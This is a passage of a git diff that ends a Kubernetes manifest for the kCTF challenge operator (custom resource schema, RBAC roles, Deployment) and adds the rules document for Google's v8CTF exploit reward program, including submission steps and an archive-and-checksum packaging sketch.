A recipient of a token must identify itself with an identifier specified in the audience of the token, and otherwise should reject the token. The audience defaults to the identifier of the apiserver. + type: string + expirationSeconds: + description: ExpirationSeconds is the requested duration of validity of the service account token. As the token approaches expiration, the kubelet volume plugin will proactively rotate the service account token. The kubelet will start trying to rotate the token if the token is older than 80 percent of its time to live or if the token is older than 24 hours. Defaults to 1 hour and must be at least 10 minutes. + format: int64 + type: integer + path: + description: Path is the path relative to the mount point of the file to project the token into. + type: string + required: + - path + type: object + type: object + type: array + type: object + quobyte: + description: Quobyte represents a Quobyte mount on the host that shares a pod's lifetime + properties: + group: + description: Group to map volume access to. Default is no group + type: string + readOnly: + description: ReadOnly here will force the Quobyte volume to be mounted with read-only permissions. Defaults to false. + type: boolean + registry: + description: Registry represents a single or multiple Quobyte Registry services specified as a string as host:port pair (multiple entries are separated with commas) which acts as the central registry for volumes + type: string + tenant: + description: Tenant owning the given Quobyte volume in the Backend. Used with dynamically provisioned Quobyte volumes, value is set by the plugin + type: string + user: + description: User to map volume access to. Defaults to serviceaccount user + type: string + volume: + description: Volume is a string that references an already created Quobyte volume by name. + type: string + required: + - registry + - volume + type: object + rbd: + description: 'RBD represents a Rados Block Device mount on the host that shares a pod''s lifetime. More info: https://examples.k8s.io/volumes/rbd/README.md' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#rbd TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + image: + description: 'The rados image name. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + keyring: + description: 'Keyring is the path to key ring for RBDUser. Default is /etc/ceph/keyring. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + monitors: + description: 'A collection of Ceph monitors. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + items: + type: string + type: array + pool: + description: 'The rados pool name. Default is rbd. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + readOnly: + description: 'ReadOnly here will force the ReadOnly setting in VolumeMounts. Defaults to false. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: boolean + secretRef: + description: 'SecretRef is name of the authentication secret for RBDUser. If provided overrides keyring. Default is nil.
More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + user: + description: 'The rados user name. Default is admin. More info: https://examples.k8s.io/volumes/rbd/README.md#how-to-use-it' + type: string + required: + - image + - monitors + type: object + scaleIO: + description: ScaleIO represents a ScaleIO persistent volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Default is "xfs". + type: string + gateway: + description: The host address of the ScaleIO API Gateway. + type: string + protectionDomain: + description: The name of the ScaleIO Protection Domain for the configured storage. + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretRef: + description: SecretRef references to the secret for ScaleIO user and other sensitive information. If this is not provided, Login operation will fail. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + sslEnabled: + description: Flag to enable/disable SSL communication with Gateway, default false + type: boolean + storageMode: + description: Indicates whether the storage for a volume should be ThickProvisioned or ThinProvisioned. Default is ThinProvisioned. + type: string + storagePool: + description: The ScaleIO Storage Pool associated with the protection domain. + type: string + system: + description: The name of the storage system as configured in ScaleIO. + type: string + volumeName: + description: The name of a volume already created in the ScaleIO system that is associated with this volume source. + type: string + required: + - gateway + - secretRef + - system + type: object + secret: + description: 'Secret represents a secret that should populate this volume. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + properties: + defaultMode: + description: 'Optional: mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value pair in the Data field of the referenced Secret will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the Secret, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. 
+ properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + optional: + description: Specify whether the Secret or its keys must be defined + type: boolean + secretName: + description: 'Name of the secret in the pod''s namespace to use. More info: https://kubernetes.io/docs/concepts/storage/volumes#secret' + type: string + type: object + storageos: + description: StorageOS represents a StorageOS volume attached and mounted on Kubernetes nodes. + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretRef: + description: SecretRef specifies the secret to use for obtaining the StorageOS API credentials. If not specified, default values will be attempted. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + volumeName: + description: VolumeName is the human-readable name of the StorageOS volume. Volume names are only unique within a namespace. + type: string + volumeNamespace: + description: VolumeNamespace specifies the scope of the volume within StorageOS. If no namespace is specified then the Pod's namespace will be used. This allows the Kubernetes name scoping to be mirrored within StorageOS for tighter integration. Set VolumeName to any name to override the default behaviour. Set to "default" if you are not using namespaces within StorageOS. Namespaces that do not pre-exist within StorageOS will be created. + type: string + type: object + vsphereVolume: + description: VsphereVolume represents a vSphere volume attached and mounted on kubelets host machine + properties: + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + storagePolicyID: + description: Storage Policy Based Management (SPBM) profile ID associated with the StoragePolicyName. + type: string + storagePolicyName: + description: Storage Policy Based Management (SPBM) profile name. 
+ type: string + volumePath: + description: Path that identifies vSphere volume vmdk + type: string + required: + - volumePath + type: object + required: + - name + type: object + type: array + required: + - containers + type: object + type: object + type: object + powDifficultySeconds: + default: 0 + description: The quantity of seconds of the proof of work + type: integer + replicas: + default: 1 + description: The desired quantity of replicas if horizontal pod autoscaler is disabled + format: int32 + type: integer + required: + - image + type: object + status: + description: ChallengeStatus defines the observed state of Challenge + properties: + health: + default: disabled + description: Shows healthcheck returns + type: string + status: + default: up-to-date + description: 'Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Says if the challenge is up to date or being updated' + type: string + required: + - health + - status + type: object + type: object + served: true + storage: true + subresources: + status: {} +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: kctf-operator-leader-election-role + namespace: kctf-operator-system +rules: +- apiGroups: + - "" + resources: + - configmaps + verbs: + - get + - list + - watch + - create + - update + - patch + - delete +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - list + - watch + - create + - update + - patch + - delete +- apiGroups: + - "" + resources: + - events + verbs: + - create + - patch +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + creationTimestamp: null + name: kctf-operator-manager-role +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - apps + resources: + - deployments + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - cloud.google.com + resources: + - backendconfigs + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - configmaps + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - endpoints + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - nodes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - persistentvolumeclaims + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - persistentvolumes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - pods + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - secrets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - "" + resources: + - services + 
verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - extensions + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - kctf.dev + resources: + - challenges + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - kctf.dev + resources: + - challenges/finalizers + verbs: + - update +- apiGroups: + - kctf.dev + resources: + - challenges/status + verbs: + - get + - patch + - update +- apiGroups: + - networking.gke.io + resources: + - managedcertificates + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - networking.k8s.io + resources: + - networkpolicies + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterrolebindings + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: kctf-operator-metrics-reader +rules: +- nonResourceURLs: + - /metrics + verbs: + - get +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: kctf-operator-proxy-role +rules: +- apiGroups: + - authentication.k8s.io + resources: + - tokenreviews + verbs: + - create +- apiGroups: + - authorization.k8s.io + resources: + - subjectaccessreviews + verbs: + - create +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: kctf-operator-leader-election-rolebinding + namespace: kctf-operator-system +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kctf-operator-leader-election-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: kctf-operator-manager-rolebinding +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kctf-operator-manager-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: kctf-operator-proxy-rolebinding +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kctf-operator-proxy-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: v1 +data: + controller_manager_config.yaml: | + apiVersion: controller-runtime.sigs.k8s.io/v1alpha1 + kind: ControllerManagerConfig + health: + healthProbeBindAddress: :8081 + metrics: + bindAddress: 127.0.0.1:8080 + webhook: + port: 9443 + leaderElection: + leaderElect: true + resourceName: 558d99b6.dev +kind: ConfigMap +metadata: + name: kctf-operator-manager-config + namespace: kctf-operator-system +--- +apiVersion: v1 +kind: Service +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager-metrics-service + namespace: kctf-operator-system +spec: + ports: + - name: https + port: 8443 + protocol: TCP + targetPort: https + selector: + control-plane: controller-manager +--- 
+apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager + namespace: kctf-operator-system +spec: + replicas: 1 + selector: + matchLabels: + control-plane: controller-manager + template: + metadata: + labels: + control-plane: controller-manager + spec: + containers: + - args: + - --secure-listen-address=0.0.0.0:8443 + - --upstream=http://127.0.0.1:8080/ + - --logtostderr=true + - --v=10 + image: gcr.io/kubebuilder/kube-rbac-proxy:v0.8.0 + name: kube-rbac-proxy + ports: + - containerPort: 8443 + name: https + protocol: TCP + - args: + - --health-probe-bind-address=:8081 + - --metrics-bind-address=127.0.0.1:8080 + - --leader-elect + command: + - /manager + env: + - name: ALLOWED_IPS + value: 0.0.0.0/0 + - name: SECURITY_POLICY + value: DISABLED + image: gcr.io/kctf-docker/kctf-operator@sha256:ad8cf85ab93a9cfbd8fa1ccc221851933a3e6ef554f18041c581b0f72b33cae2 + livenessProbe: + httpGet: + path: /healthz + port: 8081 + initialDelaySeconds: 15 + periodSeconds: 20 + name: manager + readinessProbe: + httpGet: + path: /readyz + port: 8081 + initialDelaySeconds: 5 + periodSeconds: 10 + resources: + limits: + cpu: 200m + memory: 100Mi + requests: + cpu: 100m + memory: 20Mi + securityContext: + allowPrivilegeEscalation: false + securityContext: + runAsNonRoot: true + serviceAccountName: kctf-operator-controller-manager + terminationGracePeriodSeconds: 10 diff --git a/v8ctf/rules.md b/v8ctf/rules.md new file mode 100644 index 00000000..6e54245e --- /dev/null +++ b/v8ctf/rules.md @@ -0,0 +1,41 @@ +# v8CTF Rules + +The v8CTF is part of the [Google VRP](https://g.co/vrp) in which we reward successful exploitation attempts against a V8 version running on our infrastructure. +This program is orthogonal to the [Chrome VRP](https://g.co/chrome/vrp): if you find a bug and exploit it, you can submit the bug to the Chrome VRP and still use the exploit for the v8CTF. + +In the following, we differentiate between 0-day and n-day exploits. +If the bug that led to the initial memory corruption was found by you, i.e. it was reported from the same email address as the one used for the v8CTF submission, we will consider the exploit a 0-day submission. +All other exploits are considered n-day submissions. + +## Rules + +The following rules apply to the eligibility of exploits: +* Your exploit needs to exfiltrate the flag from our v8CTF infrastructure. +* Only the first submission for a given bug that leads to the initial memory corruption is eligible. +* Only the first submission per deployed V8 version in v8CTF is eligible, based on the timestamp of the form submission. + * 0-day submissions are exempt from this limit. +* Exploits need to be reasonably fast and stable. We accept submissions with an average runtime of less than 5 minutes and a success rate of at least 80%. +* Valid submissions get a reward of $10,000. + +## Submission Process + +1. If your exploit targets a 0-day vulnerability, make sure to report it first to the [Chrome VRP](https://g.co/chrome/vrp). +1. Check [this sheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vTWvO0tFNl8fJbOmTV1nwGJi4fAy5pDg-6DsHARRubj8I6c7_11RQ36Jv735zj9EQggz6AWjAOaebJh/pubhtml?gid=0&single=true) to see whether there's already a submission for the currently deployed V8 version. +1. Exploit the bug and capture the flag from our v8CTF environment. +1. Create a .tar.gz archive of your exploit and calculate its sha256, e.g. with `sha256sum exploit.tar.gz`; see the packaging sketch at the end of this document. + 1.
Please double-check that the exploit doesn’t have any external dependencies. +1. Fill out [this form](https://docs.google.com/forms/d/e/1FAIpQLScoWE5-XoF85dXMjWKTIrJGTEfCybFaktsYZMCZ86iFPrW8Ew/viewform?usp=header_link) with the flag and the sha256 sum of the exploit. + 1. For 0-day submissions, please use the same email address you reported the bug from. +1. A bug in the Google Issue Tracker will be filed on your behalf. Attach the exploit matching the sha256 sum, along with a short write-up, to the bug. +1. Give us a few days to validate your submission. + +## Setup + +You can find a description of our v8CTF infrastructure in the [README](https://github.com/google/security-research/blob/master/v8ctf/README.md). + +## Communication + +We have two Discord channels set up on the [Capture The Flag](https://discord.gg/hqcSdTk6vm) server: + +* #v8ctf-announcements: will be used for announcements, such as changes to the rules. +* #v8ctf: is open to all. If you have any questions, please ask here.
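+
+## Packaging Sketch
+
+A minimal sketch of the archiving step from the submission process, assuming the exploit lives in a local directory named `exploit/` (the directory and archive names are illustrative, not required by the rules):
+
+```bash
+# Bundle the exploit; everything it needs must be inside the archive,
+# since submissions must not rely on external dependencies.
+tar -czf exploit.tar.gz exploit/
+
+# Compute the checksum that goes into the submission form.
+sha256sum exploit.tar.gz
+```
+
+The sha256 sum printed by the last command is the value to enter in the form, and the matching `exploit.tar.gz` is what you later attach to the Issue Tracker bug.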